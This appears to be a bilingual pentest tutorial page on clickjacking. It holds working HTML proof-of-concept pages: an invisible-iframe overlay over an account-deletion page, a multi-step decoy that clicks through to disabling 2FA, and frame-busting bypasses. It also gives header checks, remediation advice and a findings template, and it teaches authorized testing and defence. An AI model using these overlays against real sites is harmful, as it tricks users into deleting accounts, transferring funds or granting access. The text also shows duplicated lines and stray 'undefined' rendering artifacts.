Back to Details

performing-clickjacking-attack-test

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Performing Clickjacking Attack Test

执行Clickjacking攻击测试

When to Use

适用场景

  • During authorized penetration tests when assessing UI redressing vulnerabilities
  • When testing whether sensitive actions (delete account, transfer funds, change settings) can be performed via clickjacking
  • For evaluating the effectiveness of X-Frame-Options and Content-Security-Policy frame-ancestors directives
  • When assessing applications that process one-click actions without additional confirmation
  • During security audits of applications handling financial transactions or account management
  • 在授权渗透测试中评估UI篡改类漏洞时
  • 测试敏感操作(删除账户、转账、修改设置)是否可通过Clickjacking执行时
  • 评估X-Frame-Options和Content-Security-Policy frame-ancestors指令的有效性时
  • 评估无需额外确认即可执行一键操作的应用程序时
  • 处理金融交易或账户管理的应用程序安全审计期间

Prerequisites

前置条件

  • Authorization: Written penetration testing agreement for the target
  • Web browser: Modern browser for testing iframe embedding
  • Local web server: Python 
    http.server
    or similar for hosting PoC pages
  • Burp Suite: For examining response headers
  • HTML/CSS knowledge: For crafting clickjacking overlay pages
  • curl: For checking framing headers on target pages
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
  • 授权许可:针对目标的书面渗透测试协议
  • Web浏览器:用于测试iframe嵌入的现代浏览器
  • 本地Web服务器:Python 
    http.server
    或类似工具,用于托管PoC页面
  • Burp Suite:用于检查响应头
  • HTML/CSS知识:用于编写Clickjacking覆盖页面
  • curl:用于检查目标页面的框架相关头信息
法律声明:本技能仅用于授权安全测试和教育目的。未经授权对非自有或未获得书面测试许可的系统使用本技能属于违法行为,可能违反计算机欺诈相关法律。

Workflow

工作流程

Step 1: Check Frame Embedding Protections

步骤1:检查框架嵌入保护机制

Examine response headers for anti-clickjacking defenses.
bash
undefined
检查响应头中的反Clickjacking防御措施。
bash
undefined

Check X-Frame-Options header

Check X-Frame-Options header

curl -s -I "https://target.example.com/" | grep -i "x-frame-options"
curl -s -I "https://target.example.com/" | grep -i "x-frame-options"

Expected values:

Expected values:

X-Frame-Options: DENY (blocks all framing)

X-Frame-Options: DENY (blocks all framing)

X-Frame-Options: SAMEORIGIN (allows same-origin framing)

X-Frame-Options: SAMEORIGIN (allows same-origin framing)

X-Frame-Options: ALLOW-FROM https://trusted.com (deprecated, limited support)

X-Frame-Options: ALLOW-FROM https://trusted.com (deprecated, limited support)

Check Content-Security-Policy frame-ancestors directive

Check Content-Security-Policy frame-ancestors directive

curl -s -I "https://target.example.com/" | grep -i "content-security-policy"
curl -s -I "https://target.example.com/" | grep -i "content-security-policy"

Look for: frame-ancestors 'none' or frame-ancestors 'self'

Look for: frame-ancestors 'none' or frame-ancestors 'self'

frame-ancestors 'none' = equivalent to DENY

frame-ancestors 'none' = equivalent to DENY

frame-ancestors 'self' = equivalent to SAMEORIGIN

frame-ancestors 'self' = equivalent to SAMEORIGIN

Test multiple sensitive pages

Test multiple sensitive pages

for page in / /account/settings /account/delete /transfer
/admin/dashboard /change-password /change-email; do echo -n "$page: " headers=$(curl -s -I "https://target.example.com$page") xfo=$(echo "$headers" | grep -i "x-frame-options" | tr -d '\r') csp=$(echo "$headers" | grep -i "content-security-policy" | grep -o "frame-ancestors[^;]*" | tr -d '\r') if [ -z "$xfo" ] && [ -z "$csp" ]; then echo "NO PROTECTION" else echo "${xfo:-none} | ${csp:-none}" fi done
for page in / /account/settings /account/delete /transfer
/admin/dashboard /change-password /change-email; do echo -n "$page: " headers=$(curl -s -I "https://target.example.com$page") xfo=$(echo "$headers" | grep -i "x-frame-options" | tr -d '\r') csp=$(echo "$headers" | grep -i "content-security-policy" | grep -o "frame-ancestors[^;]*" | tr -d '\r') if [ -z "$xfo" ] && [ -z "$csp" ]; then echo "NO PROTECTION" else echo "${xfo:-none} | ${csp:-none}" fi done

Check if JavaScript frame-busting is used (weak protection)

Check if JavaScript frame-busting is used (weak protection)

curl -s "https://target.example.com/" | grep -i "top.location|parent.location|frameElement"
undefined
curl -s "https://target.example.com/" | grep -i "top.location|parent.location|frameElement"
undefined

Step 2: Test Basic Iframe Embedding

步骤2:测试基础Iframe嵌入

Attempt to embed the target page in an iframe to confirm vulnerability.
html
<!-- basic-frame-test.html -->
<html>
<head><title>Clickjacking Frame Test</title></head>
<body>
<h1>Frame Embedding Test</h1>
<p>If the target page loads below, it is vulnerable to clickjacking.</p>

<!-- Test basic framing -->
<iframe src="https://target.example.com/account/settings"
        width="800" height="600"
        style="border: 2px solid red;">
</iframe>

<p>If you see "Refused to display" in console or blank iframe,
   the page has frame protection.</p>
</body>
</html>
bash
undefined
尝试将目标页面嵌入iframe以确认是否存在漏洞。
html
<!-- basic-frame-test.html -->
<html>
<head><title>Clickjacking Frame Test</title></head>
<body>
<h1>Frame Embedding Test</h1>
<p>If the target page loads below, it is vulnerable to clickjacking.</p>

<!-- Test basic framing -->
<iframe src="https://target.example.com/account/settings"
        width="800" height="600"
        style="border: 2px solid red;">
</iframe>

<p>If you see "Refused to display" in console or blank iframe,
   the page has frame protection.</p>
</body>
</html>
bash
undefined

Host the test page

Host the test page

cd /tmp cat > frame-test.html << 'EOF'
<html> <body> <h1>Clickjacking Test</h1> <iframe src="https://target.example.com/account/settings" width="800" height="600"></iframe> </body> </html> EOF python3 -m http.server 8888
cd /tmp cat > frame-test.html << 'EOF'
<html> <body> <h1>Clickjacking Test</h1> <iframe src="https://target.example.com/account/settings" width="800" height="600"></iframe> </body> </html> EOF python3 -m http.server 8888

Open http://localhost:8888/frame-test.html in browser

Open http://localhost:8888/frame-test.html in browser

Check browser console for framing errors

Check browser console for framing errors

undefined
undefined

Step 3: Craft Clickjacking Proof of Concept

步骤3:编写Clickjacking概念验证代码

Build an overlay attack that tricks users into clicking hidden elements.
html
<!-- clickjacking-poc.html -->
<html>
<head>
<title>Win a Prize!</title>
<style>
  body {
    margin: 0;
    padding: 0;
    font-family: Arial, sans-serif;
  }

  /* Invisible iframe containing target page */
  #target-frame {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    opacity: 0.0001;  /* Nearly invisible */
    z-index: 2;       /* On top of decoy */
    border: none;
  }

  /* Decoy content that tricks the user */
  #decoy {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: 1;
    background: white;
  }

  /* Position the "Click here" button exactly over the target's
     sensitive button (adjust top/left values based on target layout) */
  #click-bait {
    position: absolute;
    top: 350px;    /* Align with target's "Delete Account" button */
    left: 400px;   /* Align horizontally */
    padding: 15px 30px;
    background: #4CAF50;
    color: white;
    font-size: 18px;
    cursor: pointer;
    border: none;
    border-radius: 5px;
  }
</style>
</head>
<body>

<!-- Decoy content visible to the user -->
<div id="decoy">
  <h1 style="text-align:center; margin-top:100px;">
    Congratulations! You Won!
  </h1>
  <p style="text-align:center;">
    Click the button below to claim your prize
  </p>
  <button id="click-bait">CLAIM PRIZE</button>
</div>

<!-- Hidden iframe with target's sensitive action -->
<iframe id="target-frame"
  src="https://target.example.com/account/delete"
  scrolling="no">
</iframe>

</body>
</html>
构建一个覆盖攻击页面,诱使用户点击隐藏元素。
html
<!-- clickjacking-poc.html -->
<html>
<head>
<title>Win a Prize!</title>
<style>
  body {
    margin: 0;
    padding: 0;
    font-family: Arial, sans-serif;
  }

  /* Invisible iframe containing target page */
  #target-frame {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    opacity: 0.0001;  /* Nearly invisible */
    z-index: 2;       /* On top of decoy */
    border: none;
  }

  /* Decoy content that tricks the user */
  #decoy {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: 1;
    background: white;
  }

  /* Position the "Click here" button exactly over the target's
     sensitive button (adjust top/left values based on target layout) */
  #click-bait {
    position: absolute;
    top: 350px;    /* Align with target's "Delete Account" button */
    left: 400px;   /* Align horizontally */
    padding: 15px 30px;
    background: #4CAF50;
    color: white;
    font-size: 18px;
    cursor: pointer;
    border: none;
    border-radius: 5px;
  }
</style>
</head>
<body>

<!-- Decoy content visible to the user -->
<div id="decoy">
  <h1 style="text-align:center; margin-top:100px;">
    Congratulations! You Won!
  </h1>
  <p style="text-align:center;">
    Click the button below to claim your prize
  </p>
  <button id="click-bait">CLAIM PRIZE</button>
</div>

<!-- Hidden iframe with target's sensitive action -->
<iframe id="target-frame"
  src="https://target.example.com/account/delete"
  scrolling="no">
</iframe>

</body>
</html>

Step 4: Create Multi-Step Clickjacking Attack

步骤4:创建多步Clickjacking攻击

For actions requiring multiple clicks, create a multi-step overlay.
html
<!-- multi-step-clickjacking.html -->
<html>
<head>
<title>Complete Survey</title>
<style>
  #target-frame {
    position: absolute;
    width: 100%;
    height: 100%;
    opacity: 0.0001;
    z-index: 2;
    border: none;
  }
  #step-container {
    text-align: center;
    margin-top: 200px;
    z-index: 1;
    position: relative;
  }
  .step { display: none; }
  .step.active { display: block; }
  .btn {
    padding: 15px 40px;
    font-size: 18px;
    background: #2196F3;
    color: white;
    border: none;
    cursor: pointer;
    margin-top: 20px;
  }
</style>
</head>
<body>

<div id="step-container">
  <!-- Step 1: Click aligns with "Settings" link on target -->
  <div class="step active" id="step1">
    <h2>Step 1: Select your reward</h2>
    <button class="btn" onclick="nextStep()"
      style="position:absolute; top:200px; left:300px;">
      Gold Package
    </button>
  </div>

  <!-- Step 2: Click aligns with "Delete Account" button -->
  <div class="step" id="step2">
    <h2>Step 2: Confirm your choice</h2>
    <button class="btn" onclick="nextStep()"
      style="position:absolute; top:350px; left:400px;">
      Confirm
    </button>
  </div>

  <!-- Step 3: Click aligns with "Yes, I'm sure" confirmation -->
  <div class="step" id="step3">
    <h2>Step 3: Claim reward!</h2>
    <button class="btn"
      style="position:absolute; top:400px; left:450px;">
      Claim Now!
    </button>
  </div>
</div>

<iframe id="target-frame"
  src="https://target.example.com/account/settings">
</iframe>

<script>
var currentStep = 1;
function nextStep() {
  document.getElementById('step' + currentStep).classList.remove('active');
  currentStep++;
  document.getElementById('step' + currentStep).classList.add('active');
  // Optionally change iframe src for multi-page flows
}
</script>
</body>
</html>
对于需要多次点击的操作,创建多步覆盖页面。
html
<!-- multi-step-clickjacking.html -->
<html>
<head>
<title>Complete Survey</title>
<style>
  #target-frame {
    position: absolute;
    width: 100%;
    height: 100%;
    opacity: 0.0001;
    z-index: 2;
    border: none;
  }
  #step-container {
    text-align: center;
    margin-top: 200px;
    z-index: 1;
    position: relative;
  }
  .step { display: none; }
  .step.active { display: block; }
  .btn {
    padding: 15px 40px;
    font-size: 18px;
    background: #2196F3;
    color: white;
    border: none;
    cursor: pointer;
    margin-top: 20px;
  }
</style>
</head>
<body>

<div id="step-container">
  <!-- Step 1: Click aligns with "Settings" link on target -->
  <div class="step active" id="step1">
    <h2>Step 1: Select your reward</h2>
    <button class="btn" onclick="nextStep()"
      style="position:absolute; top:200px; left:300px;">
      Gold Package
    </button>
  </div>

  <!-- Step 2: Click aligns with "Delete Account" button -->
  <div class="step" id="step2">
    <h2>Step 2: Confirm your choice</h2>
    <button class="btn" onclick="nextStep()"
      style="position:absolute; top:350px; left:400px;">
      Confirm
    </button>
  </div>

  <!-- Step 3: Click aligns with "Yes, I'm sure" confirmation -->
  <div class="step" id="step3">
    <h2>Step 3: Claim reward!</h2>
    <button class="btn"
      style="position:absolute; top:400px; left:450px;">
      Claim Now!
    </button>
  </div>
</div>

<iframe id="target-frame"
  src="https://target.example.com/account/settings">
</iframe>

<script>
var currentStep = 1;
function nextStep() {
  document.getElementById('step' + currentStep).classList.remove('active');
  currentStep++;
  document.getElementById('step' + currentStep).classList.add('active');
  // Optionally change iframe src for multi-page flows
}
</script>
</body>
</html>

Step 5: Test Frame-Busting Bypass Techniques

步骤5:测试框架逃逸绕过技术

If JavaScript-based frame protection is used, attempt to bypass it.
html
<!-- Bypass frame-busting JavaScript -->

<!-- Technique 1: sandbox attribute blocks top-level navigation -->
<iframe src="https://target.example.com/account/settings"
  sandbox="allow-scripts allow-forms allow-same-origin"
  width="800" height="600">
</iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting -->

<!-- Technique 2: Double framing -->
<!-- If target checks: if (top !== self) top.location = self.location -->
<!-- Frame the page through an intermediate page that also frames -->
<iframe src="intermediate.html" width="800" height="600"></iframe>
<!-- intermediate.html contains: <iframe src="https://target.example.com/..."> -->

<!-- Technique 3: Intercept onbeforeunload -->
<script>
window.onbeforeunload = function() {
  return "Are you sure?";  // Prevents navigation away
};
</script>
<iframe src="https://target.example.com/account/settings"
  width="800" height="600">
</iframe>

<!-- Technique 4: Using data: URI or about:blank -->
<iframe id="f" src="about:blank" width="800" height="600"></iframe>
<script>
var iframe = document.getElementById('f');
iframe.contentDocument.write(
  '<iframe src="https://target.example.com/account/settings" width="100%" height="100%"></iframe>'
);
</script>
如果目标使用基于JavaScript的框架保护机制,尝试绕过它。
html
<!-- Bypass frame-busting JavaScript -->

<!-- Technique 1: sandbox attribute blocks top-level navigation -->
<iframe src="https://target.example.com/account/settings"
  sandbox="allow-scripts allow-forms allow-same-origin"
  width="800" height="600">
</iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting -->

<!-- Technique 2: Double framing -->
<!-- If target checks: if (top !== self) top.location = self.location -->
<!-- Frame the page through an intermediate page that also frames -->
<iframe src="intermediate.html" width="800" height="600"></iframe>
<!-- intermediate.html contains: <iframe src="https://target.example.com/..."> -->

<!-- Technique 3: Intercept onbeforeunload -->
<script>
window.onbeforeunload = function() {
  return "Are you sure?";  // Prevents navigation away
};
</script>
<iframe src="https://target.example.com/account/settings"
  width="800" height="600">
</iframe>

<!-- Technique 4: Using data: URI or about:blank -->
<iframe id="f" src="about:blank" width="800" height="600"></iframe>
<script>
var iframe = document.getElementById('f');
iframe.contentDocument.write(
  '<iframe src="https://target.example.com/account/settings" width="100%" height="100%"></iframe>'
);
</script>

Step 6: Validate Impact and Document Finding

步骤6:验证影响并记录发现

Confirm that the clickjacking leads to meaningful impact.
bash
undefined
确认Clickjacking攻击会产生实际影响。
bash
undefined

Host the PoC and test the attack flow

Host the PoC and test the attack flow

cd /tmp python3 -m http.server 8888
cd /tmp python3 -m http.server 8888

Testing steps:

Testing steps:

1. Log in to target.example.com in the browser

1. Log in to target.example.com in the browser

2. Open http://localhost:8888/clickjacking-poc.html

2. Open http://localhost:8888/clickjacking-poc.html

3. Click the decoy button

3. Click the decoy button

4. Verify the sensitive action was performed on the target

4. Verify the sensitive action was performed on the target

For report: adjust iframe opacity to show overlap

For report: adjust iframe opacity to show overlap

Change opacity from 0.0001 to 0.5 for screenshot evidence

Change opacity from 0.0001 to 0.5 for screenshot evidence

This shows the target page visible behind the decoy content

This shows the target page visible behind the decoy content

Document which sensitive actions are vulnerable:

Document which sensitive actions are vulnerable:

- Account deletion

- Account deletion

- Password/email change

- Password/email change

- Fund transfer

- Fund transfer

- Permission/role changes

- Permission/role changes

- Enabling/disabling security features

- Enabling/disabling security features

undefined
undefined

Key Concepts

核心概念

ConceptDescription
ClickjackingUI redressing attack that tricks users into clicking hidden elements by overlaying decoy content
X-Frame-OptionsHTTP header controlling whether a page can be embedded in iframes (DENY, SAMEORIGIN)
frame-ancestorsCSP directive specifying valid parents for iframe embedding (supersedes X-Frame-Options)
Frame BustingJavaScript-based defense that attempts to break out of iframes (easily bypassable)
LikejackingClickjacking variant targeting social media "Like" or "Share" buttons
CursorjackingVariant using CSS to offset the visible cursor from the actual click position
Multi-step ClickjackingAttack requiring multiple clicks, with decoy content changing at each step
概念描述
ClickjackingUI篡改攻击,通过覆盖诱饵内容诱使用户点击隐藏元素
X-Frame-Options控制页面是否可嵌入iframe的HTTP头(可选值:DENY、SAMEORIGIN)
frame-ancestorsCSP指令,指定iframe嵌入的合法父页面(替代X-Frame-Options)
Frame Busting基于JavaScript的防御机制,尝试跳出iframe(易被绕过)
LikejackingClickjacking变种,针对社交媒体的"点赞"或"分享"按钮
Cursorjacking使用CSS使可见光标与实际点击位置偏移的变种攻击
Multi-step Clickjacking需要多次点击的攻击,每一步诱饵内容都会变化

Tools & Systems

工具与系统

ToolPurpose
Burp Suite ProfessionalExamining X-Frame-Options and CSP headers on responses
Clickjack Tester (browser)Browser-based iframe embedding test tool
Browser DevToolsInspecting frame embedding behavior and console errors
Python http.serverHosting clickjacking PoC pages locally
OWASP ZAPAutomated detection of missing anti-framing headers
securityheaders.comOnline scanner for missing security headers
工具用途
Burp Suite Professional检查响应中的X-Frame-Options和CSP头
Clickjack Tester (browser)基于浏览器的iframe嵌入测试工具
Browser DevTools检查框架嵌入行为和控制台错误
Python http.server本地托管Clickjacking PoC页面
OWASP ZAP自动检测缺失的反框架头
securityheaders.com在线扫描缺失的安全头

Common Scenarios

常见场景

Scenario 1: Account Deletion via Clickjacking

场景1:通过Clickjacking删除账户

The account deletion page at 
/account/delete
has no X-Frame-Options header. An attacker creates a page with a "Win a prize" button positioned over the "Delete My Account" button in a transparent iframe.
/account/delete
账户删除页面未设置X-Frame-Options头。攻击者创建一个页面,将"赢取奖品"按钮定位在透明iframe中的"删除我的账户"按钮上方。

Scenario 2: One-Click Fund Transfer

场景2:一键转账Clickjacking

A banking application performs transfers via a single button click on a pre-filled form. Without frame protection, the attacker embeds the transfer page in an iframe and overlays a decoy "Play Game" button.
银行应用通过预填表单的单个按钮完成转账。在没有框架保护的情况下,攻击者将转账页面嵌入iframe,并覆盖一个"开始游戏"的诱饵按钮。

Scenario 3: 2FA Disable via Multi-Step Clickjacking

场景3:多步Clickjacking禁用双因素认证

Disabling two-factor authentication requires two clicks (settings link, then disable button). A multi-step clickjacking PoC guides the victim through two decoy clicks that align with the real buttons.
禁用双因素认证需要两次点击(设置链接、禁用按钮)。多步Clickjacking PoC引导受害者完成两次诱饵点击,分别对应真实按钮的位置。

Scenario 4: OAuth Authorization Clickjack

场景4:OAuth授权Clickjacking

An OAuth consent screen allows framing. The attacker embeds the consent page and tricks the victim into clicking "Authorize", granting the attacker's application access to the victim's account.
OAuth授权页面允许被框架嵌入。攻击者嵌入授权页面,诱使受害者点击"授权",从而让攻击者的应用获得受害者账户的访问权限。

Output Format

输出格式

undefined
undefined

Clickjacking Vulnerability Finding

Clickjacking Vulnerability Finding

Vulnerability: Clickjacking - Missing Frame Embedding Protection Severity: Medium (CVSS 6.1) Location: /account/settings, /account/delete, /transfer OWASP Category: A04:2021 - Insecure Design
Vulnerability: Clickjacking - Missing Frame Embedding Protection Severity: Medium (CVSS 6.1) Location: /account/settings, /account/delete, /transfer OWASP Category: A04:2021 - Insecure Design

Headers Analysis

Headers Analysis

PageX-Frame-OptionsCSP frame-ancestorsVulnerable
/Not setNot setYes
/account/settingsNot setNot setYes
/account/deleteNot setNot setYes
/transferNot setNot setYes
/loginSAMEORIGIN-No
PageX-Frame-OptionsCSP frame-ancestorsVulnerable
/Not setNot setYes
/account/settingsNot setNot setYes
/account/deleteNot setNot setYes
/transferNot setNot setYes
/loginSAMEORIGIN-No

Sensitive Actions Exploitable

Sensitive Actions Exploitable

  1. Account deletion (single click, no re-authentication)
  2. Email change (single click, no confirmation)
  3. 2FA disable (two clicks, multi-step PoC)
  4. Fund transfer (pre-filled form, single click)
  1. Account deletion (single click, no re-authentication)
  2. Email change (single click, no confirmation)
  3. 2FA disable (two clicks, multi-step PoC)
  4. Fund transfer (pre-filled form, single click)

Impact

Impact

  • Account takeover via email change clickjacking
  • Account destruction via delete clickjacking
  • Financial loss via transfer clickjacking
  • Security downgrade via 2FA disable clickjacking
  • Account takeover via email change clickjacking
  • Account destruction via delete clickjacking
  • Financial loss via transfer clickjacking
  • Security downgrade via 2FA disable clickjacking

Recommendation

Recommendation

  1. Add 
    Content-Security-Policy: frame-ancestors 'none'
    to all pages
  2. Set 
    X-Frame-Options: DENY
    as fallback for older browsers
  3. Require re-authentication for sensitive actions (delete, transfer)
  4. Add confirmation dialogs that cannot be pre-filled or auto-submitted
  5. Implement SameSite=Strict cookies to reduce session availability in frames
undefined
  1. Add 
    Content-Security-Policy: frame-ancestors 'none'
    to all pages
  2. Set 
    X-Frame-Options: DENY
    as fallback for older browsers
  3. Require re-authentication for sensitive actions (delete, transfer)
  4. Add confirmation dialogs that cannot be pre-filled or auto-submitted
  5. Implement SameSite=Strict cookies to reduce session availability in frames
undefined